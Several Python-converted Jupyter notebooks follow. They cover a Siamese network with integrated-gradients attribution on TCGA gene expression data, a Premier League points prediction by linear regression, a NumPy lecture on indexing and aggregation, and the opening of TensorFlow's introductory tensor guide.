cuda = torch.cuda.is_available()
print("Cuda is available: {}".format(cuda))
classes = {key:val for val,key in enumerate(train[target].cat.categories.values)}
classes
# +
from tcga_datasets import TCGA, SiameseTCGA
root_dir = "../data/TCGA/rna-seq_pan/"
batch_size = 1
train_dataset = TCGA(root_dir, samples=train, train=True, target=target, norm=False)
test_dataset = TCGA(root_dir, samples=test, train=False, target=target, norm=False)
scaler = StandardScaler()
train_dataset.data = pd.DataFrame(scaler.fit_transform(train_dataset.data),
index=train_dataset.data.index,
columns=train_dataset.data.columns)
test_dataset.data = pd.DataFrame(scaler.transform(test_dataset.data),
index=test_dataset.data.index,
columns=test_dataset.data.columns)
kwargs = {'num_workers': 10, 'pin_memory': True} if cuda else {'num_workers': 10}
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False, **kwargs)
# -
# ## Siamese Network
# +
# Step 1 set up dataloader
root_dir = "../data/TCGA"
siamese_train_dataset = SiameseTCGA(train_dataset) # Returns pairs of images and target same/different
siamese_test_dataset = SiameseTCGA(test_dataset)
batch_size = 8
kwargs = {'num_workers': 10, 'pin_memory': True} if cuda else {}
siamese_train_loader = torch.utils.data.DataLoader(siamese_train_dataset, batch_size=batch_size, shuffle=True, **kwargs)
siamese_test_loader = torch.utils.data.DataLoader(siamese_test_dataset, batch_size=batch_size, shuffle=False, **kwargs)
# Set up the network and training parameters
from tcga_networks import EmbeddingNet, SiameseNet
from losses import ContrastiveLoss
from metrics import AccumulatedAccuracyMetric
# Step 2
embedding_net = EmbeddingNet()
# Step 3
model = SiameseNet(embedding_net)
if cuda:
model.cuda()
# Step 4
margin = 1.
loss_fn = ContrastiveLoss(margin)
lr = 1e-3
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = lr_scheduler.StepLR(optimizer, 8, gamma=0.1, last_epoch=-1)
n_epochs = 20
# print training metrics every log_interval * batch_size
log_interval = 30
# -
train_loss, val_loss = fit(siamese_train_loader, siamese_test_loader, model, loss_fn, optimizer, scheduler,
n_epochs, cuda, log_interval)
plt.plot(range(0, n_epochs), train_loss, 'rx-')
plt.plot(range(0, n_epochs), val_loss, 'bx-')
train_embeddings_cl, train_labels_cl = vis.extract_embeddings(train_loader, model)
vis.plot_embeddings(train_embeddings_cl, train_labels_cl, siamese_train_dataset.labels_dict)
val_embeddings_baseline, val_labels_baseline = vis.extract_embeddings(test_loader, model)
vis.plot_embeddings(val_embeddings_baseline, val_labels_baseline, siamese_test_dataset.labels_dict)
# ## Integrated Gradients
# Test completeness axiom through comparison of different baselines
#
# "Integrated gradients satisfy an
# axiom called completeness that the attributions add up to
# the difference between the output of F at the input x and
# the baseline x'."
import copy
from captum.attr import LayerActivation
from captum.attr import IntegratedGradients
tmp_model = copy.deepcopy(model)
tmp_model
def attribution_pairs(SiameseTCGA, exp, ctrl):
# subset different samples
negative_pairs = np.array(SiameseTCGA.test_pairs)
negative_pairs = negative_pairs[negative_pairs[:,2] == 0]
# map labels to integers
ctrl = siamese_test_dataset.labels_dict[ctrl]
exp = siamese_test_dataset.labels_dict[exp]
# ordered indices of samples
ctrl_data = [idx for pair in negative_pairs[:, :2] for idx in pair if np.isin(idx, SiameseTCGA.label_to_indices[ctrl])]
exp_data = [idx for pair in negative_pairs[:, :2] for idx in pair if np.isin(idx, SiameseTCGA.label_to_indices[exp])]
# data
ctrl_data = Variable(SiameseTCGA.test_data[ctrl_data], requires_grad=True)
exp_data = Variable(SiameseTCGA.test_data[exp_data], requires_grad=True)
return ctrl_data, exp_data
# ### IG with Control vector
ctrl_data, exp_data = attribution_pairs(siamese_test_dataset, exp='Primary Tumor', ctrl='Solid Tissue Normal')
ig = IntegratedGradients(tmp_model.get_embedding)
attr, delta = ig.attribute(exp_data.cuda(), ctrl_data.cuda(), target=0, n_steps=50, return_convergence_delta=True)
attr = attr.cpu().detach().numpy()
attr.shape
feat_imp = pd.DataFrame(data=attr.mean(axis=0), index=train_dataset.data.columns, columns=['Attribution'])
feat_imp.hist(bins=100)
feat_imp.describe()
feat_imp.nlargest(10, columns='Attribution')
# ### Test completeness axiom
# - Euclidean Distance between samples
# - feature attribution sum
# - difference between
# +
pdist = torch.nn.PairwiseDistance(p=2)
outdist = pdist(exp_data, ctrl_data)
diff = np.round(outdist.detach().numpy() - attr.sum(axis=1), 3)
diff.mean(); np.median(diff); diff.var()
# -
# #### Inspect individual sample attributions
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nlargest(10)
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nsmallest(10)
# #### Check embedding of zero-feature vector
base_zero = torch.zeros(siamese_test_dataset.test_data.shape[1]).cuda()
base_emb = model.get_embedding(base_zero)
base_emb
# #### Check loss of baseline vectors
# - control data
# - zero vector
# - random values
target = torch.tensor(0, dtype=float)
model.get_loss(ctrl_data.cuda(), exp_data.cuda(), target, ContrastiveLoss(margin))
base_zero = torch.zeros(exp_data.shape).cuda()
model.get_loss(base_zero, exp_data.cuda(), target, ContrastiveLoss(margin))
rand_base = torch.rand_like(exp_data).cuda()
model.get_loss(rand_base, exp_data.cuda(), target, ContrastiveLoss(margin))
# ### IG with zero-feature vector
attr, delta = ig.attribute(exp_data.cuda(), target=0, n_steps=50, return_convergence_delta=True)
attr = attr.cpu().detach().numpy()
attr.shape
feat_imp = pd.DataFrame(data=attr.mean(axis=0), index=train_dataset.data.columns, columns=['Attribution'])
feat_imp.hist(bins=100)
feat_imp.describe()
feat_imp.nlargest(10, columns='Attribution')
# +
pdist = torch.nn.PairwiseDistance(p=2)
outdist = pdist(exp_data, ctrl_data)
diff = np.round(outdist.detach().numpy() - attr.sum(axis=1), 3)
diff.mean(); np.median(diff); diff.var()
# -
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nlargest(10)
|
notebook/2020.01.27_converging-model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Premier League Prediction using Machine Learning
# ### Importing Libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
#Extracting data
dataset=pd.read_excel('MainData.xlsx')
dataset2=pd.read_excel('PL_2019-20.xlsx')
dataset.head()
dataset.shape
dataset.describe()
dataset.index
dataset.info()
dataset.isna().sum()
# +
#Filling NAN values
dataset['GD'] = dataset['GF']-dataset['GA']
dataset2['GD'] = dataset2['GF']-dataset2['GA']
# -
dataset.head()
# +
# Filling NAN values in Xg GD
dataset['Xg GD'] = dataset['Expected Goals (Xg)']-dataset['Xg Conceded']
dataset2['Xg GD'] = dataset2['Expected Goals (Xg)']-dataset2['Xg Conceded']
# -
dataset.head()
# # Data Analysis
# Teams with most wins, draws and losses
sns.barplot(x='W', y='Name', data=dataset)
y = dataset['D']
x = dataset['Name']
plt.bar(x,y)
plt.xlabel("Teams")
plt.grid()
plt.xticks(rotation = 80)
plt.ylabel("goals")
plt.title("D vs Teams")
plt.show()
sns.barplot(x='L', y='Name', data=dataset)
# #### Attacking Analysis
sns.barplot(data=dataset, y='Name', x='GF').set(title='Goals Scored')
#plt.xticks(rotation=70)
plt.tight_layout()
sns.barplot(data=dataset, x='Name', y='Expected Goals (Xg)').set(title='Expected Goals')
plt.xticks(rotation=70)
plt.tight_layout()
# Difference between Goals scored and Xg to determine which team overperformed and which team underperformed in attack
dataset['GF_minus_Xg'] = dataset['GF']-dataset['Expected Goals (Xg)']
dataset.head()
dataset.plot(x="Name", y=["GF","Expected Goals (Xg)"], kind="bar",figsize=(9,8))
# ##### Defending Analysis
sns.barplot(data=dataset, x='Name', y='GA').set(title='Goals Conceded')
plt.xticks(rotation=70)
plt.tight_layout()
sns.barplot(data=dataset, y='Name', x='Xg Conceded').set(title='Expected Goals Conceded')
#plt.xticks(rotation=70)
plt.tight_layout()
# Difference between Goals scored and Xg to determine which team overperformed and which team underperformed in attack
dataset['GA_minus_Xa'] = dataset['GA']-dataset['Xg Conceded']
dataset.head()
dataset.plot(x="Name", y=["GA","Xg Conceded"], kind="bar",figsize=(9,8))
# Top 5 teams Possession Distribution
newdf = dataset.head()
plt.pie(newdf['Possession'], labels = newdf['Name'],startangle=100, shadow = False, explode = (0.1, 0.1, 0.1, 0.1,0.1), autopct = "%.1f%%")
plt.grid()
#plt.xticks(rotation=40)
plt.title("Average possession")
plt.axis("equal")
plt.show()
# ##### Chances created vs Chances missed
dataset.plot(x="Name", y=["Big Chances Created","Big Chances Missed"], kind="bar",figsize=(9,8))
# #### Goal Difference vs Expected Goal Difference
#
# Expected Goal Difference Xg GD = Xg - Xa
dataset.plot(x="Name", y=["GD","Xg GD"], kind="bar",figsize=(9,8))
dataset['GD_minus_XgD'] = dataset['GD'] - dataset['Xg GD']
dataset.head()
# Clean Sheets vs Saves Per Match Scatter plot
sns.relplot(x="Saves per Match", y="CLS", hue = 'Name',kind = 'scatter',data=dataset)
plt.show()
sns.barplot(x='Red Cards', y='Name', data=dataset)
# #### Home Wins vs Loss Percentage
dataset['Home Win%'] = (dataset['Home W']/(dataset['PM']/2))*100
dataset['Home Loss%'] = (dataset['Home L']/(dataset['PM']/2))*100
dataset['Home D%'] = (((dataset['PM']/2) -(dataset['Home W']+dataset['Home L']))/(dataset['PM']/2))*100
dataset.head()
dataset.plot(x="Name", y=["Home Win%","Home Loss%" ,"Home D%"], kind="bar",figsize=(9,8))
# Adding Total Points in this Dataset
dataset['Points'] = dataset['W']*3 + dataset['D']
dataset2['Points'] = dataset2['W']*3 + dataset2['D']
dataset.head()
# ### Finding Correlation between Pairs and Varaibles using Correlation Matrix
newdf2 = dataset.copy()
newdf2.drop(['PM','D','GF','GA','Expected Goals (Xg)','Xg Conceded','Big Chances Missed'],axis = 1, inplace = True)
newdf2.drop(['GD_minus_XgD','GF_minus_Xg','GA_minus_Xa','Red Cards', 'Saves per Match','Home W','Away W', 'Home L','Home Win%','Home D%','Home Loss%'],axis = 1, inplace = True)
newdf2.head()
# +
### Correlation matrix implementation
corr_mat=newdf2.corr()
sns.heatmap(corr_mat, annot=True)
# -
# # Data Preprocessing
# Bottom 3 Teams Got Relegated so we Won't be using their Data as they won't be in the league this season
dataset.drop(['GD_minus_XgD','GF_minus_Xg','GA_minus_Xa', 'GD_minus_XgD','Home W','Away W', 'Home L','Home Win%','Home D%','Home Loss%'],axis = 1, inplace = True)
dataset.head()
dataset2
# +
#mc = dataset.iloc[0,:]
#mu = dataset.iloc[1,:]
#liv = dataset.iloc[2,:]
#chel = dataset.iloc[3,:]
#lei = dataset.iloc[4,:]
#whu = dataset.iloc[5,:]
#tot = dataset.iloc[6,:]
#ars = dataset.iloc[7,:]
#leeds = dataset.iloc[8,:]
#eve = dataset.iloc[9,:]
#asv = dataset.iloc[10,:]
#new = dataset.iloc[11,:]
#wol = dataset.iloc[12,:]
#cp = dataset.iloc[13,:]
#sthm = dataset.iloc[14,:]
#brh = dataset.iloc[15,:]
#bur = dataset.iloc[16,:]
#ful = dataset.iloc[17,:]
#wbrom = dataset.iloc[18,:]
#sheff = dataset.iloc[19,:]
# -
#mc.drop(labels = ['Name','Points'],inplace = True)
#mu.drop(labels = ['Name','Position'],inplace = True)
#liv.drop(labels = ['Name','Position'],inplace = True)
#chel.drop(labels = ['Name','Position'],inplace = True)
#lei.drop(labels = ['Name','Position'],inplace = True)
#whu.drop(labels = ['Name','Position'],inplace = True)
#tot.drop(labels = ['Name','Position'],inplace = True)
#ars.drop(labels = ['Name','Position'],inplace = True)
#leeds.drop(labels = ['Name','Position'],inplace = True)
#eve.drop(labels = ['Name','Position'],inplace = True)
#asv.drop(labels = ['Name','Position'],inplace = True)
#new.drop(labels = ['Name','Position'],inplace = True)
#wol.drop(labels = ['Name','Position'],inplace = True)
#cp.drop(labels = ['Name','Position'],inplace = True)
#sthm.drop(labels = ['Name','Position'],inplace = True)
#brh.drop(labels = ['Name','Position'],inplace = True)
#bur.drop(labels = ['Name','Position'],inplace = True)
#ful.drop(labels = ['Name','Position'],inplace = True)
#wbrom.drop(labels = ['Name','Position'],inplace = True)
#sheff.drop(labels = ['Name','Position'],inplace = True)
# ### Concatenation of dataset and dataset2
dataset2['Position'] = [3,1,2,4,5,7,13,8,20,17,15,10,12,14,16,6,11,9,18,19]
dataset2 = dataset2.sort_values(by = ['Position'], ascending = True)
dataset2.reset_index(drop = True,inplace = True)
dataset2['Name'].replace("Bournemouth", "Leeds United", inplace = True)
dataset2['Name'].replace("Sheffield United", "Brentford", inplace = True)
dataset['Name'].replace("Sheffield United", "Brentford", inplace = True)
dataset['Name'].replace("West Brom", "Watford", inplace = True)
array =dataset2['Name']
df = pd.concat([dataset, dataset2]).groupby('Position', as_index=False).mean()
df['Name'] = array
df = df[['Position','Name','PM','W','D','L','GF','GA','GD','CLS','Possession','Expected Goals (Xg)','Xg Conceded','Xg GD','Saves per Match','Big Chances Created','Big Chances Missed','Red Cards','xPTS','Points']]
df = df.sort_values(by = ['Points'], ascending = False)
df["Position"] = np.arange(1,21,1)
df.head()
df
# ### Data Splitting
y = dataset2['Points']
x = dataset2.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
from sklearn import model_selection
x_train,x_test,y_train,y_test = model_selection.train_test_split(x,y, train_size=0.45, random_state=0)
from sklearn.linear_model import LinearRegression
algo1 = LinearRegression()
algo1.fit(x_train,y_train)
# ###### Splitting data for evaluation
x_test_for_eval = dataset.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
y_test_for_eval = dataset['Points']
# ##### Predicting for evaluation
y_predicted_for_eval = algo1.predict(x_test_for_eval)
y_predicted_for_eval
# ## Model Evaluation
tra_data_pred = algo1.predict(x_train)
from sklearn import metrics
r2_train = metrics.r2_score(y_train,tra_data_pred)
print(r2_train*100)
from sklearn import metrics
r2_test = metrics.r2_score(y_test_for_eval,y_predicted_for_eval)
print(r2_test*100)
import matplotlib.pyplot as plt
m = 1
c = 0
x_line = np.arange(15,90,5)
y_line = m*x_line + c
plt.plot(x_line,y_line,'r')
plt.scatter(y_test_for_eval , y_predicted_for_eval)
plt.show()
# # Final Prediction
x_for_df_pred = df.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
df['Predicted Points'] = algo1.predict(x_for_df_pred)
# +
#df.head()
# -
df = df.sort_values(by = ['Predicted Points'], ascending = False)
df["Position"] = np.arange(1,21,1)
df.drop(['xPTS','PM','GF','W','L','D','GA','GD','CLS','Xg GD','Points','Expected Goals (Xg)','Possession','Xg Conceded','Xg GD','Saves per Match','Big Chances Created','Big Chances Missed','Red Cards'],axis = 1, inplace = True)
df['Predicted Points'] = df['Predicted Points'].apply(np.ceil)
df
# Top 4 teams from this table will qualify for top 4 according to our prediction including man city, man united, liverpool, chelsea.
#
# 5th and 6th position teams will qualify for europa league including leicester city and arsenal.
#
# 7th and 8th position teams will qualify for the new uefa conference league including tottenham and wolves.
# Bottom 3 will get relegated to lower leagues according to our prediction including brentford, Watford, Norwich
# ##### Saving Our Prediction in csv format
df.to_csv('PL_2021-22_Predicted.csv', index=False)
|
Working of PL_Prediciton_using_ML/Premier_League_Table_Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # NDAP: In-class demos and notes
# For 9.24.2018.
#
# ## Binary (boolean) indexing & caution
import numpy as np
arr = np.array([-10, 15, 12, 45])
arr
binary_inds = np.array([True, False, False, True])
arr[binary_inds]
integer_inds = np.array([1, 0, 0, 1])
arr[integer_inds]
# this gives the weird and ridiculous result
# not something we want
# summing booleans treats True as 1 and False as 0
sum(binary_inds), sum(integer_inds)
# ## Aggregation
# using numpy's sum method for aggregation
binary_inds.sum()
new_arr = np.array([-1, 15, 4.3, 22, -247])
new_arr
# the minimum
print(new_arr.min())
# or
print(np.min(new_arr))
new_arr.max()
# argmin gives you the index of the smallest element
new_arr.argmin()
# argmax gives you the index of the largest element
new_arr.argmax()
# ### Aggregation over multi-dimensional arrays treats the array as a single list of numbers
multidarr = np.random.rand(3,4,5)
multidarr
multidarr.shape
# a single number, the minimum over the whole array!
multidarr.min()
multidarr.sum()
# ### Adding an "axis" parameter aggregates across one dimension of the array
demo_arr = np.array([[0,3,5],[1,2,-1]])
demo_arr
# we can get the minimum of just the first column by indexing and then aggregating
demo_arr[:,0].min()
# we can get the minimum over the whole array
demo_arr.min()
# using axis=0 aggregates ACROSS ROWS (we get one value for each column)
demo_arr.min(axis=0)
# using axis=1 aggregates ACROSS COLUMNS (we get one value for each row)
demo_arr.min(axis=1)
# aside:
# taking argmin of a multi-dimensional array gives you the index of the smallest element
# IN THE FLATTENED ARRAY. this is kind of weird and should probably be avoided most of
# the time
demo_arr.argmin() # index into flattened array!
# this gives the index of the smallest element across rows (i.e. in each column)
demo_arr.argmin(axis=0)
# same, but across columns (i.e. in each row)
demo_arr.argmin(axis=1)
# argmin with a repeated element still only returns one index: the first one!
np.argmin([0, 1, 2, 3, 0]) # returns the first index!
demo_arr.shape
# aggregation over an axis REMOVES THAT AXIS FROM THE ARRAY
demo_arr.min(axis=0).shape
demo_arr.min(axis=1).shape
big_demo_arr = np.zeros((2, 6, 3, 4, 9))
big_demo_arr.shape
big_demo_arr.min(axis=2).shape
|
lecture11_numpy_contd/Lecture11-demos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:nlp_tf2]
# language: python
# name: conda-env-nlp_tf2-py
# ---
# + [markdown] colab_type="text" id="Tce3stUlHN0L"
# ##### Copyright 2020 The TensorFlow Authors.
# + cellView="form" colab={} colab_type="code" id="tuOe1ymfHZPu"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="qFdPvlXBOdUN"
# # Introduction to Tensors
# + [markdown] colab_type="text" id="MfBg1C5NB3X0"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/guide/tensor"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + colab={} colab_type="code" id="AL2hzxorJiWy"
import tensorflow as tf
import numpy as np
tf.__version__
# + [markdown] colab_type="text" id="VQ3s2J8Vgowq"
# Tensors are multi-dimensional arrays with a uniform type (called a `dtype`). You can see all supported `dtypes` at `tf.dtypes.DType`.
#
# If you're familiar with [NumPy](https://numpy.org/devdocs/user/quickstart.html), tensors are (kind of) like `np.arrays`.
#
# All tensors are immutable like python numbers and strings: you can never update the contents of a tensor, only create a new one.
#
# + [markdown] colab_type="text" id="DRK5-9EpYbzG"
# ## Basics
#
# Let's create some basic tensors.
# + [markdown] colab_type="text" id="uSHRFT6LJbxq"
# Here is a "scalar" or "rank-0" tensor . A scalar contains a single value, and no "axes".
# + colab={} colab_type="code" id="d5JcgLFR6gHv"
# This will be an int32 tensor by default; see "dtypes" below.
rank_0_tensor = tf.constant(4)
print(rank_0_tensor)
# + [markdown] colab_type="text" id="tdmPAn9fWYs5"
# A "vector" or "rank-1" tensor is like a list of values. A vector has 1-axis:
# + colab={} colab_type="code" id="oZos8o_R6oE7"
# Let's make this a float tensor.
rank_1_tensor = tf.constant([2.0, 3.0, 4.0])
print(rank_1_tensor)
# + [markdown] colab_type="text" id="G3IJG-ug_H4u"
# A "matrix" or "rank-2" tensor has 2-axes:
# + colab={} colab_type="code" id="cnOIA_xb6u0M"
# If we want to be specific, we can set the dtype (see below) at creation time
rank_2_tensor = tf.constant([[1, 2],
[3, 4],
[5, 6]], dtype=tf.float16)
print(rank_2_tensor)
# + [markdown] colab_type="text" id="19m72qEPkfxi"
# <table>
# <tr>
# <th>A scalar, shape: <code>[]</code></th>
# <th>A vector, shape: <code>[3]</code></th>
# <th>A matrix, shape: <code>[3, 2]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/scalar.png" alt="A scalar, the number 4" />
# </td>
#
# <td>
# <img src="images/tensor/vector.png" alt="The line with 3 sections, each one containing a number."/>
# </td>
# <td>
# <img src="images/tensor/matrix.png" alt="A 3x2 grid, with each cell containing a number.">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="fjFvzcn4_ehD"
# Tensors may have more axes, here is a tensor with 3-axes:
# + colab={} colab_type="code" id="sesW7gw6JkXy"
# There can be an arbitrary number of
# axes (sometimes called "dimensions")
rank_3_tensor = tf.constant([
[[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]],
[[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19]],
[[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]],])
print(rank_3_tensor)
# + [markdown] colab_type="text" id="rM2sTGIkoE3S"
# There are many ways you might visualize a tensor with more than 2-axes.
# + [markdown] colab_type="text" id="NFiYfNMMhDgL"
# <table>
# <tr>
# <th colspan=3>A 3-axis tensor, shape: <code>[3, 2, 5]</code></th>
# <tr>
# <tr>
# <td>
# <img src="images/tensor/3-axis_numpy.png"/>
# </td>
# <td>
# <img src="images/tensor/3-axis_front.png"/>
# </td>
#
# <td>
# <img src="images/tensor/3-axis_block.png"/>
# </td>
# </tr>
#
# </table>
# + [markdown] colab_type="text" id="oWAc0U8OZwNb"
# You can convert a tensor to a NumPy array either using `np.array` or the `tensor.numpy` method:
# + colab={} colab_type="code" id="J5u6_6ZYaS7B"
np.array(rank_2_tensor)
# + colab={} colab_type="code" id="c6Taz2gIaZeo"
rank_2_tensor.numpy()
# + [markdown] colab_type="text" id="hnz19F0ocEKD"
# Tensors often contain floats and ints, but have many other types, including:
#
# * complex numbers
# * strings
#
# The base `tf.Tensor` class requires tensors to be "rectangular"---that is, along each axis, every element is the same size. However, there are specialized types of Tensors that can handle different shapes:
#
# * ragged (see [RaggedTensor](#ragged_tensors) below)
# * sparse (see [SparseTensor](#sparse_tensors) below)
# + [markdown] colab_type="text" id="SDC7OGeAIJr8"
# We can do basic math on tensors, including addition, element-wise multiplication, and matrix multiplication.
# + colab={} colab_type="code" id="-DTkjwDOIIDa"
a = tf.constant([[1, 2],
[3, 4]])
b = tf.constant([[1, 1],
[1, 1]]) # Could have also said `tf.ones([2,2])`
print(tf.add(a, b), "\n")
print(tf.multiply(a, b), "\n")
print(tf.matmul(a, b), "\n")
# + colab={} colab_type="code" id="2smoWeUz-N2q"
print(a + b, "\n") # element-wise addition
print(a * b, "\n") # element-wise multiplication
print(a @ b, "\n") # matrix multiplication
# + [markdown] colab_type="text" id="S3_vIAl2JPVc"
# Tensors are used in all kinds of operations (ops).
# + colab={} colab_type="code" id="Gp4WUYzGIbnv"
c = tf.constant([[4.0, 5.0], [10.0, 1.0]])
# Find the largest value
print(tf.reduce_max(c))
# Find the index of the largest value
print(tf.argmax(c))
# Compute the softmax
print(tf.nn.softmax(c))
# + [markdown] colab_type="text" id="NvSAbowVVuRr"
# ## About shapes
# + [markdown] colab_type="text" id="hkaBIqkTCcGY"
# Tensors have shapes. Some vocabulary:
#
# * **Shape**: The length (number of elements) of each of the dimensions of a tensor.
# * **Rank**: Number of tensor dimensions. A scalar has rank 0, a vector has rank 1, a matrix is rank 2.
# * **Axis** or **Dimension**: A particular dimension of a tensor.
# * **Size**: The total number of items in the tensor, the product shape vector
#
# + [markdown] colab_type="text" id="E9L3-kCQq2f6"
# Note: Although you may see reference to a "tensor of two dimensions", a rank-2 tensor does not usually describe a 2D space.
# + [markdown] colab_type="text" id="VFOyG2tn8LhW"
# Tensors and `tf.TensorShape` objects have convenient properties for accessing these:
# + colab={} colab_type="code" id="RyD3yewUKdnK"
rank_4_tensor = tf.zeros([3, 2, 4, 5])
# + [markdown] colab_type="text" id="oTZZW9ziq4og"
# <table>
# <tr>
# <th colspan=2>A rank-4 tensor, shape: <code>[3, 2, 4, 5]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/shape.png" alt="A tensor shape is like a vector.">
# <td>
# <img src="images/tensor/4-axis_block.png" alt="A 4-axis tensor">
# </td>
# </tr>
# </table>
#
# + colab={} colab_type="code" id="MHm9vSqogsBk"
print("Type of every element:", rank_4_tensor.dtype)
print("Number of dimensions:", rank_4_tensor.ndim)
print("Shape of tensor:", rank_4_tensor.shape)
print("Elements along axis 0 of tensor:", rank_4_tensor.shape[0])
print("Elements along the last axis of tensor:", rank_4_tensor.shape[-1])
print("Total number of elements (3*2*4*5): ", tf.size(rank_4_tensor).numpy())
# + [markdown] colab_type="text" id="bQmE_Vx5JilS"
# While axes are often referred to by their indices, you should always keep track of the meaning of each. Often axes are ordered from global to local: The batch axis first, followed by spatial dimensions, and features for each location last. This way feature vectors are contiguous regions of memory.
#
# <table>
# <tr>
# <th>Typical axis order</th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/shape2.png" alt="Keep track of what each axis is. A 4-axis tensor might be: Batch, Width, Height, Freatures">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="FlPoVvJS75Bb"
# ## Indexing
# + [markdown] colab_type="text" id="apOkCKqCZIZu"
# ### Single-axis indexing
#
# TensorFlow follow standard python indexing rules, similar to [indexing a list or a string in python](https://docs.python.org/3/tutorial/introduction.html#strings), and the bacic rules for numpy indexing.
#
# * indexes start at `0`
# * negative indices count backwards from the end
# * colons, `:`, are used for slices `start:stop:step`
#
# + colab={} colab_type="code" id="SQ-CrJxLXTIM"
rank_1_tensor = tf.constant([0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
print(rank_1_tensor.numpy())
# + [markdown] colab_type="text" id="mQYYL56PXSak"
# Indexing with a scalar removes the dimension:
# + colab={} colab_type="code" id="n6tqHciOWMt5"
print("First:", rank_1_tensor[0].numpy())
print("Second:", rank_1_tensor[1].numpy())
print("Last:", rank_1_tensor[-1].numpy())
# + [markdown] colab_type="text" id="qJLHU_a2XwpG"
# Indexing with a `:` slice keeps the dimension:
# + colab={} colab_type="code" id="giVPPcfQX-cu"
print("Everything:", rank_1_tensor[:].numpy())
print("Before 4:", rank_1_tensor[:4].numpy())
print("From 4 to the end:", rank_1_tensor[4:].numpy())
print("From 2, before 7:", rank_1_tensor[2:7].numpy())
print("Every other item:", rank_1_tensor[::2].numpy())
print("Reversed:", rank_1_tensor[::-1].numpy())
# + [markdown] colab_type="text" id="elDSxXi7X-Bh"
# ### Multi-axis indexing
# + [markdown] colab_type="text" id="Cgk0uRUYZiai"
# Higher rank tensors are indexed by passing multiple indices.
#
# The single-axis exact same rules as in the single-axis case apply to each axis independently.
# + colab={} colab_type="code" id="Tc5X_WlsZXmd"
print(rank_2_tensor.numpy())
# + [markdown] colab_type="text" id="w07U9vq5ipQk"
# Passing an integer for each index the result is a scalar.
# + colab={} colab_type="code" id="PvILXc1PjqTM"
# Pull out a single value from a 2-rank tensor
print(rank_2_tensor[1, 1].numpy())
# + [markdown] colab_type="text" id="3RLCzAOHjfEH"
# You can index using any combination integers and slices:
# + colab={} colab_type="code" id="YTqNqsfJkJP_"
# Get row and column tensors
print("Second row:", rank_2_tensor[1, :].numpy())
print("Second column:", rank_2_tensor[:, 1].numpy())
print("Last row:", rank_2_tensor[-1, :].numpy())
print("First item in last column:", rank_2_tensor[0, -1].numpy())
print("Skip the first row:")
print(rank_2_tensor[1:, :].numpy(), "\n")
# + [markdown] colab_type="text" id="P45TwSUVSK6G"
# Here is an example with a 3-axis tensor:
# + colab={} colab_type="code" id="GuLoMoCVSLxK"
print(rank_3_tensor[:, :, 4])
# + [markdown] colab_type="text" id="9NgmHq27TJOE"
# <table>
# <tr>
# <th colspan=2>Selecting the last feature across all locations in each example in the batch </th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/index1.png" alt="A 3x2x5 tensor with all the values at the index-4 of the last axis selected.">
# </td>
# <td>
# <img src="images/tensor/index2.png" alt="The selected values packed into a 2-axis tensor.">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="fpr7R0t4SVb0"
# ## Manipulating Shapes
#
# Reshaping a tensor is of great utility.
#
# The `tf.reshape` operation is fast and cheap as the underlying data does not need to be duplicated.
#
# + colab={} colab_type="code" id="EMeTtga5Wq8j"
# Shape returns a `TensorShape` object that shows the size on each dimension
var_x = tf.Variable(tf.constant([[1], [2], [3]]))
print(var_x.shape)
# + colab={} colab_type="code" id="38jc2RXziT3W"
# You can convert this object into a Python list, too
print(var_x.shape.as_list())
